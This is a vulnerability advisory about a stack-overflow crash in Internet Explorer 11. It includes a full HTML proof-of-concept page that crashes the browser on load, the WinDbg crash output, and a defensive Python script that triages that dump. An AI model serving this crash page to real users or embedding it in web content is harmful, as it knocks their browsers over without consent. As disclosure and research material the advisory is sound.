Microsoft Internet Explorer 11 Stack Overflow Denial of Service Vulnerability
Affected Systems:
Microsoft Internet Explorer 11
Description:
Bugtraq id: 76651
Internet Explorer is a web browser developed by Microsoft.
Microsoft Internet Explorer 11 contains a remote denial of service vulnerability. An attacker can exploit it to crash the affected application.
Source: Mjx
Test method:
Alert: The following procedure (method) may be offensive and is intended only for security research and teaching. Use at your own risk!
<!--
# Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC
# Date: 09.11.2015
# Vulnerable version: 11 (32bit version) (newest at the time 11.0.9600.17843 and 11.0.10240.16431)
# Tested on: Windows 7 64bit and Windows 10 (10240) 64bit
# Author: Mjx
# Http://jinxin.pen.io/
-->
<!DOCTYPE html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<title>crash IE 11</title>
<style></style>
<script type='text/javascript'></script>
<script>
function crash()
{
    // Build an unusual element tree by appending new nodes to elements
    // addressed by their position in document.all.
    var id_0 = null;
    id_0 = document.createElement('THEAD');
    document.body.appendChild(id_0);
    elemTree = [];
    elemTree[0] = document.createElement('SELECT');
    document.all[7].appendChild(elemTree[0]);
    elemTree[1] = document.createElement('B');
    document.all[8].appendChild(elemTree[1]);
    elemTree[2] = document.createElement('SOURCE');
    document.all[0].appendChild(elemTree[2]);
    elemTree[3] = document.createElement('HR');
    document.all[8].appendChild(elemTree[3]);
    elemTree[3].setAttribute('hidden', -4400000000);
    elemTree[4] = document.createElement('SELECT');
    document.all[9].appendChild(elemTree[4]);
    elemTree[5] = document.createElement('RUBY');
    document.all[2].appendChild(elemTree[5]);
    elemTree[6] = document.createElement('OL');
    document.all[4].appendChild(elemTree[6]);
    elemTree[7] = document.createElement('AREA');
    document.all[6].appendChild(elemTree[7]);
    elemTree[8] = document.createElement('ARTICLE');
    document.all[3].appendChild(elemTree[8]);
    elemTree[9] = document.createElement('TEXTAREA');
    document.all[1].appendChild(elemTree[9]);
    // Select text ranges over the body and apply editing commands to them;
    // the second command triggers the stack overflow shown in the debugger output below.
    txtRange = document.body.createTextRange();
    txtRange.moveEnd('character', 14);
    txtRange.select();
    txtRange.execCommand('insertUnorderedList', true, null);
    txtRange = document.body.createTextRange();
    txtRange.moveEnd('sentence', 4);
    txtRange.select();
    txtRange.execCommand('insertOrderedList', true, null);
}
</script>
</head>
<body onload='crash();'>
</body>
</html>
<!--
(1428.1230): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
verifier!AVrfpDphAllocateVm+0x9:
5fd166d9 50              push    eax
0:008> kb
ChildEBP RetAddr  Args to Child
09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier!AVrfpDphAllocateVm+0x9
09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier!DphCommitMemoryForPageHeap+0xf0
09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier!AVrfpDphSetProtectionsBeforeUse+0x8d
09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier!AVrfDebugPageHeapAllocate+0x1fd
0:008> r
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
verifier!AVrfpDphAllocateVm+0x9:
5fd166d9 50              push    eax
0:008> !vprot esp-4
BaseAddress:       09ab2000
AllocationBase:    09ab0000
AllocationProtect: 00000004  PAGE_READWRITE
RegionSize:        001fe000
Status:            00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE
-->
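Triaging the crash: the following Python script is an added example, not part of the advisory or the PoC author's work. It parses the WinDbg session quoted above (embedded as sample input) and applies a heuristic of my own to tell stack exhaustion (esp only a few pages above the stack's allocation base when STATUS_STACK_OVERFLOW fires, eip inside a known module symbol) from a crash that needs deeper analysis.

```python
import re

# WinDbg session from the advisory, embedded as sample input for offline triage
# (copied from the page's own output; values unchanged).
WINDBG_DUMP = """\
(1428.1230): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0         nv up ei pl nz na po nc
verifier!AVrfpDphAllocateVm+0x9:
5fd166d9 50              push    eax
0:008> !vprot esp-4
BaseAddress:       09ab2000
AllocationBase:    09ab0000
AllocationProtect: 00000004  PAGE_READWRITE
RegionSize:        001fe000
Status:            00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE
"""

PAGE = 0x1000
STATUS_STACK_OVERFLOW = 0xC00000FD  # NTSTATUS raised once the stack guard pages are used up

def parse_dump(text):
    """Extract exception code, registers, faulting symbol/instruction and !vprot fields."""
    info = {"code": int(re.search(r"code ([0-9a-f]{8})", text).group(1), 16)}
    info["regs"] = {k: int(v, 16) for k, v in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})", text)}
    m = re.search(r"^(\w+!\w+)\+0x[0-9a-f]+:\n[0-9a-f]{8}\s+[0-9a-f]+\s+(\w+)", text, re.M)
    info["symbol"], info["mnemonic"] = m.group(1), m.group(2)
    for key in ("BaseAddress", "AllocationBase", "RegionSize"):
        info[key] = int(re.search(key + r":\s+([0-9a-f]{8})", text).group(1), 16)
    info["protect"] = re.search(r"^Protect:\s+[0-9a-f]{8}\s+(\w+)", text, re.M).group(1)
    return info

def triage(info):
    """Heuristic verdict (assumption, not a vendor rule): STATUS_STACK_OVERFLOW with esp
    within a few pages of the stack allocation base is stack exhaustion, i.e. a denial
    of service rather than a memory-corruption primitive."""
    pages_above_base = (info["regs"]["esp"] - info["AllocationBase"]) // PAGE
    result = {"pages_above_base": pages_above_base, "faulting_symbol": info["symbol"],
              "faulting_instruction": info["mnemonic"], "faulting_page_protect": info["protect"]}
    if info["code"] == STATUS_STACK_OVERFLOW and pages_above_base <= 4:
        result["verdict"] = "stack_exhaustion_dos"
    else:
        result["verdict"] = "needs_analysis"
    return result

if __name__ == "__main__":
    print(triage(parse_dump(WINDBG_DUMP)))
```

To triage a real session, replace WINDBG_DUMP with the log text; the regular expressions expect the standard x86 register line and `!vprot` layout shown above.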
Suggestion:
Vendor patch:
Microsoft
---------
Currently the vendor has not released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.microsoft.com/windows/ie/default.asp